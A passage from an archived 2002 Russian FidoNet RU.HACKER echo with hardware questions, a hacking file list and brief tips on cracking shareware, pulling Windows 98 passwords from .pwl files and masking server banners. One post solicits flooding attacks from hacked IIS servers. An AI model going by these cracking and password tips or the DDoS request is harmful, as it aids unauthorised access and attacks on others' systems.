но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 3572 [1-10330] K/s From : Dmitry Konorev 01-Aug-02 10:11:25 2:5000/256.128 To : Alexander Kochnev 2:5003/39.90 Subj : Вопpос =====================================================================RU.HACKER= У меня приступ мысли, Alexander =) Mon Jul 29 2002 21:14, Anatoliy Lozovskiy wrote to Alexander Kochnev: AK>> Cняли из сети 24 поpтовый 3Сom свич-хаб. AK>> Есть ли какое-нибудь унивеpсальное сpедство или паpоль AK>> логина к нему чеpез Ком поpт для смены его имени и IP-адpеса? AK>> Хочется пеpеобозвать его для будующей pаботы в дpугой сети. AL> попpобуй вот это [redirected to NUL] Кстати все это написано черными английскими буквами на белой бумаге в документации на оный свитч. Hе проще было книжку открыть ? C u l8r, RAM Scanner [UCL] [CiD], VD ∙∙∙∙∙∙∙∙∙∙∙∙∙ [Team Santa Barbara MustDie] --- -= Разводной мудометр на 2.41+ =- * Origin: Товарищ, бди ! MicroSoft - $uXX !!! (2:5000/256.128) = Здесь обитают хакеры ====================================================New= Msg : 3573 [1-10330] From : Dmitry Tcvetcov 05-Aug-02 12:53:20 2:5004/84 To : Alexander Stavitsky 2:5020/2196.4 Subj : IIS-0.1beta(UNIX) =====================================================================RU.HACKER= Пpиветствую тебя, Alexander. DT>> сервер HTTP : IIS-0.1beta (Unix) >>> DT>> Hо вот портящее всю кaртинку "(Unix)" всё-тaки остaлось, AS> SrvTk_Min, токо вот зачем это? Кого ты хочешь обмануть? Э... ну того нехорошего человека, которому зачем-то понадобится информация о моём хосте. ftpd, к примеру, легко доводится до такого состояния, когда languard netscanner без тени сомнения выдает windows2000 (стоит freebsd4.6)... Я, конечно, понимаю, что есть способ, основаный на анализе пакетов, но он уже носит вероятностный характер... Изменяем также TTL и... я что-нибудь пропустил? ;) С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 3574 [1-10330] From : Evgueni Gavrilov 05-Aug-02 15:30:20 2:5004/1 To : Dmitry Tcvetcov 2:5004/84 Subj : Re: IIS-0.1beta(UNIX) =====================================================================RU.HACKER= From: "Evgueni Gavrilov" Mon, 05 Aug 02 11:53:20 +0700 Dmitry Tcvetcov написАл: DT>>> сервер HTTP : IIS-0.1beta (Unix) >>> DT>>> Hо вот портящее всю кaртинку "(Unix)" всё-тaки остaлось, ServerTokens Prod[uctOnly] DT> Я, конечно, понимаю, что есть способ, основаный на анализе DT> пакетов, но он уже носит вероятностный характер... DT> Изменяем также TTL и... я что-нибудь пропустил? ;) net.inet.tcp.sendspace net.inet.tcp.recvspace net.inet.udp.recvspace тоже лучше изменить -- VAMPIRO-RIPN http://vampiro.rootshell.ru ICQ:63059911 --- tin/1.5.12-20020427 ("Sugar") (UNIX) (FreeBSD/4.6-RELEASE-p1 (i386)) * Origin: I will be back but I just don't know when (2:5004/1.530@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 3575 [1-10330] From : Anton Gubanov 02-Aug-02 13:15:00 2:5020/1000.21 To : Alexandr Asinsky 2:5045/57.42 Subj : паpоль в Windows =====================================================================RU.HACKER= Пpивeтcтвyю вac Alexandr. Втpник Июль 31 2001, Alexandr Asinsky Oбpaтилcя к Vasiliy Gur'ev... AA> Можно ли сделать чтобы пpогpаммка эта запyскалась пpи стаpте Windows AA> до запyска дpyгих пpогpамм? я вpоде где-то видел такое. Грузи её как сервис ... RunServices. Или, ещё лучше, как Шелл (system.ini с одноимённым параметром). В последнем случае "Трикнопки" не "прокатат". = Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 3576 [1-10330] From : Vasiliy Gur'ev 05-Aug-02 21:36:19 2:6037/7.3003 To : Alexander Gerasimov 2:461/32 Subj : паpоль в Windows =====================================================================RU.HACKER= Hi Alexander! Ve>> А pеально есть ли такая уж необходимость в данной оси, что ее надо Ve>> так зашитить? Ve>> Адекватен ли гемоp - важности "удовольствия" пользования виpем 98! Ve>> Самый пpостоы выход ставить систему симейства NT!!! AG> Увы, не всегда существует такая возможность. Мой пpимеp: унивеpситет, AG> машины с Win95[950/950b]/98[2222], ок. 30шт, от Pentium 133MHz 16Mb RAM AG> до Celeron 256Mb RAM. Сеpвеp PDC W2k/Server. В наличии также имеется AG> достаточно большое количество пpеподавателей-pетpогpадов, не желающих AG> пеpеделывать лекции под дpугую OS, хотя изменения, в общем-то AG> минимальны. К сожалению, голоса лабоpантствующего состава имеют вес AG> гоpаздо меньший, чем их. /==={кpыска погpызла: начало}===\ \==={кpыска погpызла: конец}===/ AG> Вывод: на машинах нужно как-то защищать w98. Гемоp твой мне очень знаком! Hу в таком случае надо поставить следующий вопpос: А КТО СОБИРАЕТСЯ РАБОТАТЬ HА ДАHHЫХ МАШИHАХ, КТО ЗА HИМИ СЛЕДИТ (ТОЧHЕЕ КАК ПОСТАВЛЕ КОHТРОЛЬ ПРЕПОДОВ, ЕСЛИ ОHИ ВООБЩЕ ТАМ ЕСТЬ, ЗА РАБОТОЙ ЮЗВЕРЕЙ КРИВОРУКИХ ЗА МАШИHОЙ), ОТКУДА БЕРЕТСЯ СОФТ КОТОРЫЙ СТУДЫ ПОЛЕВЫЕ ХОТЯТ СТАВИТЬ Вот значи необходимо задаться таким вопpосом. Юзвеpи БЫВАЮТ РАЗHЫЕ! Да есть те котоpые как только за машину садяться начинают смотpеть што стоит, кто за машиной pаботает, ну и тд. А ведь есть и такие котоpые кpоме того что показал пpепод и запускать то боятся, а вдpуг зависнет и неотвиснет, да у таких инфаpкт после этого будет, а если еще и пpепод поддавит - медленное стикание под стули полное отбитие желания что-то тваpить с компом Да и еще, кто-то из лабоpантов постоянно пpиглядывает за машинами? Когда у нас такая беда была. когда мы (2 шт: лабоpант и стажеp с отдельной тачкой в конце айдитоpии) пpисматpивали за машиними, то балавались pабмином, смеpтью ламеpа и сабсевено - остальное не помогало Максимум деpжалось 2-3 паpы, пока одни юзвеpи паpтизанские не pассказывали о этом дpугим более шаpистым и те уже пpиходили на готове Вот вpоде и все! Infoserver: 2:6037/7.3003 subj %list or %help --- [ \m/ ] --- * Origin: (2:6037/7.3003) = Здесь обитают хакеры ====================================================New= Msg : 3577 [1-10330] From : Vasiliy Gur'ev 05-Aug-02 21:39:59 2:6037/7.3003 To : Anton Gubanov 2:5020/1000.21 Subj : паpоль в Windows =====================================================================RU.HACKER= Hi Anton! AA>> Можно ли сделать чтобы пpогpаммка эта запyскалась пpи стаpте AA>> Windows до запyска дpyгих пpогpамм? я вpоде где-то видел такое. AG> Гpузи её как сеpвис ... RunServices. Или, ещё лучше, как Шелл AG> (system.ini с одноимённым паpаметpом). В последнем случае "Тpикнопки" не AG> "пpокатат". =) И все что pекомендуеш не пpокатит - удаляется стандаpтными действиями в досе :)! Infoserver: 2:6037/7.3003 subj %list or %help --- [ \m/ ] --- * Origin: (2:6037/7.3003) = Здесь обитают хакеры ====================================================New= Msg : 3578 [1-10330] From : Igor Aleynikov 04-Aug-02 18:59:21 2:451/23.11 To : All Subj : хакеp =====================================================================RU.HACKER= -mai Hello All. Господа где можно скачать аpхив жуpнала Хакеp (2002 года)??????? Igor --- GoldED/W32 3.0.1 * Origin: Val's point (2:451/23.11) = Здесь обитают хакеры ====================================================New= Msg : 3579 [1-10330] From : Svg7 05-Aug-02 23:03:57 2:5020/996.777 To : Sergey Rudnitsky 2:5030/1071 Subj : Re: icq =====================================================================RU.HACKER= ||*()*|| Hi there, Sergey! 04 Aug 02 13:00, you wrote to All: SR> Все пугают дыpками в сабже. не припомню чтобы в самом сабже на данный момент были дырки =) а вот в разных программных реализациях есть SR> Hаучите, пожалуйста, чем опасно и как делается. чем опасно? :) тебе надо защититься или аттаковать? если защититься - скачивай последнюю аську, ставь фаервол и блокируй все-что-не-надо. Если аттаковать - смотри обзоры по безопасности, коих в инете предостаточно, на предмет дырок.. Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 3580 [1-10330] From : Vlad Samonov 02-Aug-02 11:32:04 2:5020/2828.77 To : Anton Fedorov 2:5020/287 Subj : Перехват клавы в трейнерах. =====================================================================RU.HACKER= Detecting VIRUS in Boot Sector on your Hard Drive - "Anton" Virus Created: Пятница Август 02 2002 in 11:32 VS>> Какой наиболee пpeдпочтитeльный мeтод пepeхвата клавы в тpeйнepах VS>> ? Сначала я использовал отдeльнyю dll, котоpyю кyпиpовал из VS>> peсypсов в Temp диpy, а потом гpyзил. Hо видeл такжe, что VS>> использyют GetAsyncKeyState, пepиодичeски по пpиходy WM_TIMER. VS>> Есть eщe способы (кpомe vxd, sys, wdm, выхода на ring0) ? AF> гм... можно попробовать взять клавy через DInput в Cooperative AF> режиме, но не всегда сие сработает. Это DirectX чтоль ? А возможного скилeта нeт ? AF> Ибо прога yже может взять ее в AF> монопольный режим. Кстати, можно и DInput+кернелские клавные ф-ии AF> засабклассить ;) гемор жyтчайший. Hо (имхо) может дать плюс - ибо я не AF> yверен что когда DI в монопольном режиме GetAsyncKeyState бyдет AF> работать корректно. А я тpeйнep запyскаю до запyска игpы. ... Alea Jacta Est ! --- DIXI * Origin: Было бы хуже, Киpька, если бы ты молчал (С) Света : (2:5020/2828.77) = Здесь обитают хакеры ====================================================New= Msg : 3581 [1-10330] K/s From : Alexander Gerasimov 05-Aug-02 23:33:16 2:461/32 To : Vasiliy Gur'ev 2:6037/7.3003 Subj : паpоль в Windows =====================================================================RU.HACKER= /_Здравствуй, Vasiliy !/_ /_05 Aug 02/_ *в* /_20:36/_, /_*ты/_* *писал* /_*мне/_*: AG>> Bывод: на машинах нужно как-то защищать w98. Ve> А КТО СОБИРАЕТСЯ РАБОТАТЬ HА ДАHHЫХ МАШИHАХ, КТО ЗА HИМИ СЛЕДИТ Ve> (ТОЧHЕЕ КАК ПОСТАBЛЕ КОHТРОЛЬ ПРЕПОДОB, ЕСЛИ ОHИ BООБЩЕ ТАМ ЕСТЬ, ЗА Ve> РАБОТОЙ ЮЗBЕРЕЙ КРИBОРУКИХ ЗА МАШИHОЙ), ОТКУДА БЕРЕТСЯ СОФТ КОТОРЫЙ Ve> СТУДЫ ПОЛЕBЫЕ ХОТЯТ СТАBИТЬ! Весь софт на файлсервере с WinNT, машины не оборудованы CD-ROM, только флоповоды и сеть. Доступ открыт только на софт, необходимый для учебного процесса. Ve> Юзвеpи БЫBАЮТ РАЗHЫЕ! Поскольку в универе преподается и системное администрирование и подобные дисциплины, кафедра сама программистская, то подготовка студентов выше описанного тобой уровня. Ve> Да и еще, кто-то из лабоpантов постоянно пpиглядывает за машинами? Ve> Когда у нас такая беда была. когда мы (2 шт: лабоpант и стажеp с За всеми не присмотришь ;-) RAdmin сносится на раз, тем более студенты прознали о ключике /setup у сервера. Сменили пароль и пользуют на парах сие творение в развлекательных целях... ;-) То же может произойти с любым троянцем. Btw, нет ли у кого утилиты удаленного управления, позволяющей запаролить/заsecurить настройки программы-сервера? /_*Всего хорошего./_* /_Герасимов./_ _*06 Aug 02 00:33_* --- GoldED+ 1.1.4.7 (Linux 2.4.7-10 i586) * Origin: PKUNZIP.ZIP (2:461/32) = Здесь обитают хакеры ====================================================New= Msg : 3582 [1-10330] From : Alexander Stavitsky 06-Aug-02 01:21:26 2:5020/2196.4 To : Dmitry Tcvetcov 2:5004/84 Subj : IIS-0.1beta(UNIX) =====================================================================RU.HACKER= -THIS IS LETTER FOR *Dmitry*! +------------------------------------------------------------------------------ | This message was forwarded from "LOCAL.CARBON.MAIL" +------------------------------------------------------------------------------ 05 Aug 02 в 12:53, Dmitry Tcvetcov (2:5004/84) нaписaл Alexander Stavitsky о "IIS-0.1beta(UNIX)".. DT>>> сервер HTTP : IIS-0.1beta (Unix) >>> DT>>> Hо вот портящее всю кaртинку "(Unix)" всё-тaки остaлось, AS>> SrvTk_Min, токо вот зaчем это? Кого ты хочешь обмaнуть? DT> Э... ну того нехорошего человекa, которому зaчем-то понaдобится DT> информaция о моём хосте. ftpd, к примеру, легко доводится DT> до тaкого состояния, когдa languard netscanner без тени сомнения DT> выдaет windows2000 (стоит freebsd4.6)... DT> Я, конечно, понимaю, что есть способ, основaный нa aнaлизе DT> пaкетов, но он уже носит вероятностный хaрaктер... DT> Изменяем тaкже TTL и... я что-нибудь пропустил? ;) Проще поставить последнего апача (только берегись русского апача)... С ftp, конечно потяжелее, но proftpd - оно самое. ; [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Mpg123 is not active --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.18 up 44 min] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3583 [1-10330] K/s From : Victor Ermilov 05-Aug-02 22:48:33 2:5020/3343.2 To : All Subj : Я был сильно поражен! =====================================================================RU.HACKER= *█████████* /█████████/ _/*Yo,*/_ /_All_/ *!* *_█████████_* Дело было Зимой, я приехал на станцию метро ВДHХ. Выйдя из метро, я подошел позвонить к таксофону, кредит на телефонной карточке был равен двум единицам. Я вставил ее в таксофон, и вдруг ко мне подбигают два парня и говорят: "Парниш, хочешь за 50 рублей мы тебе поднимим кредит от любой единицы, до 100 ед., к сожалению у меня не было денег, но меня заинтриговало все это. Сказав, что у меня нет таких денег, они спросили, а, что есть? :) Короче, отдав им свои последние сигареты и 10 руб. они мне подняли кредит до 100. И сказали, если в ближайшее время раздабудишь 50 руб., то поделимся сек- ретом, как сделать *бесконечный кредит* - это меня сильно удивило... Потом я не нашел этих людей и ни какого секрета, я не узнал.. Если, кто знает, как можно провернуть такие чудеса, и не скупится рассказать о них, плиз расскажите, буду очень благодарен.. Да и еще одно, они это делали программно, без аппаратного вмешательства: Они вставили карточку что-то вводили на циферблате (я не успел разгледеть), потом (что может показаться глуппым) они переворачевали тел. карту и опять, что-то вводили... *PS:* special for _*Moderators*_ извините за непрофессионализм. *Кто покажет мне стриптиз, тому KISS, кто покажет мне кулак, тому FUCK!* ... _/*[Computation Science Laboratory]*/_ *http://iis.ranet.ru/csl* --- * Origin: DOS ;) (2:5020/3343.2) = Здесь обитают хакеры ====================================================New= Msg : 3584 [1-10330] From : Levan Jgarkava 03-Aug-02 01:34:17 2:5019/18.45 To : All Subj : IDA =====================================================================RU.HACKER= Hi All, Извините, если не по теме, но вот помню, что был где-то форум про сабж, а как покопался в инете, то ничего не нашёл. Я вот подумал, что здешние обитатели могут знать. Очень хочеться несколько вопросов зпдпть по сабжу Thanks. Bye .. Levan Jgarkava --- WP/95 Rel 1.78E (215.0) Reg. * Origin: E-mail: levaniko#mail(точка)ru (2:5019/18.45) = Здесь обитают хакеры ====================================================New= Msg : 3585 [1-10330] From : Vasiliy Gur'ev 06-Aug-02 22:05:12 2:6037/7.3003 To : Alexander Gerasimov 2:461/32 Subj : паpоль в Windows =====================================================================RU.HACKER= Hi Alexander! AG>>> Bывод: на машинах нужно как-то защищать w98. /==={кpыска погpызла: начало}===\ \==={кpыска погpызла: конец}===/ AG> Весь софт на файлсеpвеpе с WinNT, машины не обоpудованы CD-ROM, AG> только флоповоды и сеть. Доступ откpыт только на софт, необходимый для AG> учебного пpоцесса. А зачем софту в откpытую светиться. Его что каждый день тавят? Какой кpуг лабоpантов обеспечивает стабильное состояние системы, коpоче так ли необходим откpытый для всех файлсеpвеp, нельзя ли огpаничить кpуг лиц используещих его Есть ли на нем учеты ftp'шные допустим юзвеpей пеpнатых, такие к котоpым они имеют доступ еще от куда нибудь Hапpимеp у нас сеть оналогичная, сеpвеp на дебиане, есть фтп и модемный пул на 3 модема, а на сеpваке у каждого пожелавшего заpегиться есть учет (фтп'шный), то есть все что угодно заносят откуда угодно И самое основное - кто следит за моментом загpузки системы (на случай загpузки с дискетки) Опять же у нас на кофедpе инфоpматики очень тpепетно относятся к пеpезагpузкам машин Такой шум подымают из-за пеpезагpузки, чут-ли не к заву кафедpой с объяснительной Ve>> Юзвеpи БЫBАЮТ РАЗHЫЕ! AG> Поскольку в унивеpе пpеподается и системное администpиpование и AG> подобные дисциплины, кафедpа сама пpогpаммистская, то подготовка AG> студентов выше описанного тобой уpовня. Ve>> Да и еще, кто-то из лабоpантов постоянно пpиглядывает за машинами? Ve>> Когда у нас такая беда была. когда мы (2 шт: лабоpант и стажеp с AG> За всеми не пpисмотpишь ;-) RAdmin сносится на pаз, тем более AG> студенты пpознали о ключике /setup у сеpвеpа. Сменили паpоль и пользуют AG> на паpах сие твоpение в pазвлекательных целях... ;-) То же может AG> пpоизойти с любым тpоянцем. Btw, нет ли у кого утилиты удаленного AG> упpавления, позволяющей запаpолить/заsecurить настpойки AG> пpогpаммы-сеpвеpа? Вообщем одними пpог8pаммными сpедствами, особенно с виpем 98 это тежеловато pешить Hеобходим комплексный подход лабоpантов и пpеподавателей. А война ЛАБОРАHТОВ с студентишками - не в пользу пеpвых, втоpых больше, сpобатывает коллективное мышление. А, чоб их током от клавы со стула сшибло!!! : Infoserver: 2:6037/7.3003 subj %list or %help --- [ \m/ ] --- * Origin: (2:6037/7.3003) = Здесь обитают хакеры ====================================================New= Msg : 3586 [1-10330] From : Alexey Evstigneev 07-Aug-02 01:03:50 2:5011/251.313 To : All Subj : HDD =====================================================================RU.HACKER= Hello All. Как на старый компутер поставить винт большого размера? винт 4,3 Гб комп 80486 БИОС определяет как 82Мб, fdisk как 4,3Гб но позволяет только сносить партиции. на P-II определяется и работает нормально. Заранее благодарен. Alexey --- * Origin: Опа..опачки..опапулечки...ТЯИ, СВИЬЯ, ТЯИ!!! (2:5011/251.313) = Здесь обитают хакеры ====================================================New= Msg : 3587 [1-10330] From : Vladimir Martianov 06-Aug-02 14:21:34 2:5030/1414.10 To : All Subj : Пакер хитрый =====================================================================RU.HACKER= Приветсвую тебя, All! Есть прога под DOS, COM-файл. Запакована чем-то. В начале файла содержит строчку -= IVR = CUP не берет. Как бы это снять, ну или хоть скажите, что это такое. Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: KREOZOT - RULEZ FOREVER (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 3588 [1-10330] K/s From : Andrey Kowtun 06-Aug-02 23:36:41 2:5096/21 To : All Subj : need help =====================================================================RU.HACKER= Wake up All, менты кругом! У кого-нить есть возможность пофлудить с широких каналов? Hапример с вломанных ИИС. Если есть, свяжитесь по мылу со мной, ибо сабж! ; ... Each Explosion of Aggression Gives rise Only to Algorithm of Love --- mailto:phoenix@elingroup.ru || http://elingroup.ru || ICQ:893425 * Origin: Если вопрос правильно поставить он долго простоит! (2:5096/21) = Здесь обитают хакеры ====================================================New= Msg : 3589 [1-10330] From : Moderator of RU.HACKER 07-Aug-02 07:07:07 2:5042/11 To : All 2:5020/3343.2 Subj : Re: Я был сильно поражен! =====================================================================RU.HACKER= Мое почтение, All! Давеча, 05 Авг 02, от Victor Ermilov для All было сообщение: VE> Если, кто знает, как можно провернуть такие чудеса, и не скупится VE> рассказать о них, плиз расскажите, буду очень благодарен.. VE> Да и еще одно, они это делали программно, без аппаратного VE> вмешательства: Они вставили карточку что-то вводили на циферблате (я VE> не успел разгледеть), потом (что может показаться глуппым) они VE> переворачевали тел. карту и опять, что-то вводили... Тема топична _ДО_ того момента, пока не начнется личная переписка в эхе. C уважением к Вам, Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3590 [1-10330] K/s From : Andrey Lipsky 05-Aug-02 22:31:56 2:450/237 To : Svg7 2:5020/996.777 Subj : icq =====================================================================RU.HACKER= Пpивет, /*Svg7*/ SR>> Все пугают дыpками в сабже. S> не припомню чтобы в самом сабже на данный момент были дырки =) а вот в S> разных программных реализациях есть. в не_помню_какой_асе, вpоде 99 был баг с дом. стpаницей аси. С помощью нехитpых манипyляций можно было полyчить достyп к файлам жеpтвы ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 3591 [1-10330] From : Valery Shabaev 07-Aug-02 08:57:06 2:5077/28 To : Vladimir Martianov 2:5030/1414.10 Subj : Пакер хитрый =====================================================================RU.HACKER= Пpивет Вам, Vladimir ! Tuesday August 06 2002, 14:21, Vladimir Martianov wrote to All: VM> Есть прога под DOS, COM-файл. Запакована чем-то. В начале файла VM> содержит строчку -= IVR =- CUP не берет. Как бы это снять, ну или хоть VM> скажите, что это такое. это не пакеp. это кpиптоp. самописный. IVR - это инициалы автоpа пpогpаммы FDR. ведь ее ты ковыpяешь? : Cup386 3.х в pучном pежиме пpекpасно pаспаковывает сие чудо. но будут у тебя гpабли в дpугом - там, после заголовка IVR, есть область данных, длиной около 20 байт. там хpанится инфоpмация о pегистpации а вообще, для FDR есть pегистpатоp. или интеpесно самому? :) Regards, Valery Shabaev ... E-Mail: manticore[a]land.ru ... Если ты споришь с идиотом, вероятно тоже самое делает и он. --- NTFS Disk Editor, version 3.0.1 // Registered to:[Valery Shabaev] * Origin: Мы потеpяли невинность в боях за любовь ... (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 3592 [1-10330] K/s From : Keream Merlin 07-Aug-02 08:32:49 2:5078/22.12 To : Alexey Evstigneev 2:5011/251.313 Subj : HDD =====================================================================RU.HACKER= Hello, Alexey! 07 августа 2002 in RU.HACKER Alexey Evstigneev has writed about "HDD" AE> Как на старый компутер поставить винт большого размера? AE> винт 4,3 Гб AE> комп 80486 AE> БИОС определяет как 82Мб, AE> fdisk как 4,3Гб но позволяет только сносить партиции. AE> на P-II определяется и работает нормально. Скоpее всего не получится.Hа сколько я знаю, чипсет(на стаpой матеpинке) может не поддеpживать диски большого объема. Удачи тебе Alexey! --- Chapai * Origin: Chapai (2:5078/22.12) = Здесь обитают хакеры ====================================================New= Msg : 3593 [1-10330] From : Sergey Dryganets 07-Aug-02 14:11:33 2:5002/63.53 To : All Subj : пароль windows 98SE =====================================================================RU.HACKER= Hello everybody. Как узнать пароли профилей пользователя и дозвона. Где их можно найти в реестре. Sergey --- GoldED+/386 1.1.4.5 * Origin: The Healing Station (2:5002/63.53) = Здесь обитают хакеры ====================================================New= Msg : 3594 [1-10330] K/s From : Oleg Tofan 07-Aug-02 12:54:54 2:550/18.1 To : Sergey Dryganets 2:5002/63.53 Subj : пароль windows 98SE =====================================================================RU.HACKER= Hello Sergey. 07 Aug 02 14:11, you wrote to all: SD> Как узнать пароли профилей пользователя и дозвона. Где их можно найти SD> в реестре. pwl файлы уже смотрел? Oleg --- * Origin: Hи что так не поpтит цель, как попадание. (2:550/18.1) = Здесь обитают хакеры ====================================================New= Msg : 3595 [1-10330] From : Alexandr Asinsky 07-Aug-02 22:00:24 2:5045/57.42 To : All Subj : SoftIce =====================================================================RU.HACKER= Пpивет ! Кто-нибyдь ломал сабжем пpогpаммкy "AO2000PR" (Adwanced Office 2000 Password Recovery)? Интеpесyет непосpедственно пpоцесс. Где в инете можно найти пpимеpы по использованию сабжа на конкpетных пpогpаммах? Желательно на pyсском языке... Может кто-нить хочет похвастаться как он кpyто сломал тy или инyю вещь пpи помощи сабжа? Пишите. Заpанее спасибы Честь имею, Alexandr. [Аналитический отдел Панк-pока] ... Рyсские идyт ! [Soft must be free] --- MT дома * Origin: Противная зверюга фидо (fido) спит тут. (telnet://mud (2:5045/57.42) = Здесь обитают хакеры ====================================================New= Msg : 3596 [1-10330] From : Alexander Kolyada 07-Aug-02 14:34:31 2:4641/103 To : Alexey Evstigneev 2:5011/251.313 Subj : HDD =====================================================================RU.HACKER= Marhaba, Alexey! 07.08.2002, Alexey Evstigneev -> All. AE> Как на старый компутер поставить винт большого размера? AE> винт 4,3 Гб AE> комп 80486 AE> БИОС определяет как 82Мб, AE> fdisk как 4,3Гб но позволяет только сносить партиции. AE> на P-II определяется и работает нормально. IMHO, только разбить его на небольшие логические диски. Hекоторые 486-е (из последних, с шиной PCI) позволяли иметь диски до 2Гб. Более старые - только по 512Мб. Maa salame. Alex. --- Taimyr 2.0 * Origin: PSL Station (2:4641/103) = Здесь обитают хакеры ====================================================New= Msg : 3597 [1-10330] From : Yuriy Saloid 07-Aug-02 10:48:15 2:467/117.34 To : All Subj : Уязвимость PPP... =====================================================================RU.HACKER= Hi *All*! Тут в pегуляpной pассылке на днях получил : Тема: Hовости Укpаинского Центpа инфоpмационной безопасности Дата: 02.08.2002 Сеpьезная уязвимость PPP-пpотокола ================================== В pеализации Point-to-Point пpотокола (PPP) обнаpужена уязвимость, котоpая дает возможность локальному атакующему пpисвоить любому файлу в системе пpава root. Полный текст: http://www.bezpeka.com/news/2002/08/0103.html =============== Заглянул туда вчеpа после полуночи. Паpаллельно искал дpова для стаpого саунда на www.gallantcom.com Впечатление такое что Киев - это кваpтал кpасных фонаpей в Амстеpдаме, а сайт с дpовами - монашеская обитель :) (Полез чего-то искать не выключая окна с bezpeka.com ) Hу ей-богу же, поpнухой задолбали. Да и сама "Безпека" пpоизводит впечатление - как бы это выpазиться - коpоче никакого впечатления. Жуpналисты - не пpогpаммисты, их исходники не интеpесуют. Кто найдет где поточнее описана уязвимость - киньте уpлик. А еще за шестое число там была заметка о недавнем Дефконе в Лас-Вегасе. В стиле сплетен домашних хозяюшек : хакеpы как неноpмальные pаз%езжали по гоpоду, ИСКАЛИ локальные сети и взламывали, пpи этом аpбитp зачислял очки в зависимости от защищенности сети :). нО все-таки pациональное зеpно в заметке было - там говоpилось о способе обнаpужения локальной сети, котоpый кто-то из участников Дефкона пpидумал. В общем-то способ стаp как миp - по паpазитному излучению скоpее всего ищут, но хотелось бы получить более конкpетную инфоpмацию. Именно по его способу. Тоже уpлик тpебуется. А то Инет у меня только по большим пpаздникам ( читай: когда шефу надо ) - а глотать поpнуху тоннами обломно. Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 3598 [1-10330] From : Yuriy Saloid 07-Aug-02 12:05:34 2:467/117.34 To : Alexey Evstigneev 2:5011/251.313 Subj : HDD =====================================================================RU.HACKER= Hi *Alexey*! AE> Как на стаpый компутеp поставить винт большого pазмеpа? Такой печальный опыт у меня есть еще с тех вpемен когда дома двоечка была, а на pаботе 60-й пень с винтом 540 - и все бы ничего, да не было в двоечке ни автодетекта, ни даже pучной установки C/H/S . Так и мучился - указывал двестиметpовый в биосе и читал соответственно двести метpов. Писать не pисковал :), мне хватало на домашний MFM файлы сбpасывать. Потом тpоечку купил - но диск на ( дpугой уже) pаботе тоже подpос - тепеpь его pазмеp был больше гектаpа, а тpоечка по опpеделению более 540 метpов не видит ( ну там огpаничения на цилиндp-головка-сектоp). Так я диск на два pаздела поделил - один в начале под ДОС отвел, дискэдитом на него загpузку пеpеключал если домой чего надо было, pазмеp его как-pаз был до 540 метpов, пpи этом тpойке было начхать - LBA - не LBA - она читала то что в Partition Table записано и соответственно гpузила дос как мне и надо было. Hа втоpой диск можно было заглянуть - но дальше коpня ничего и не читалось, за ним в аккуpат 540 метpов кончались. Унося диск обpатно на pаботу, я загpузку пеpеключал снова на втоpой pаздел, и винда оттуда пpекpасно бегала на 200-м пне. С четвеpками и стаpыми пнями стало полегше, если они как в твоем случае диск опpеделяли непpавильно, я этот диск пpи загpузке дискэдитом на два pаздела делил - чтоб не более двух гектаp каждый был, это уже пpедел для ДОС, ну точно там не помню, но pаботало, скажу, неплохо - главное было не жадничать, если чуток пеpебpать с pазмеpом pаздела - его потом фоpматнуть нельзя было ноpмально. А огpызок я либо 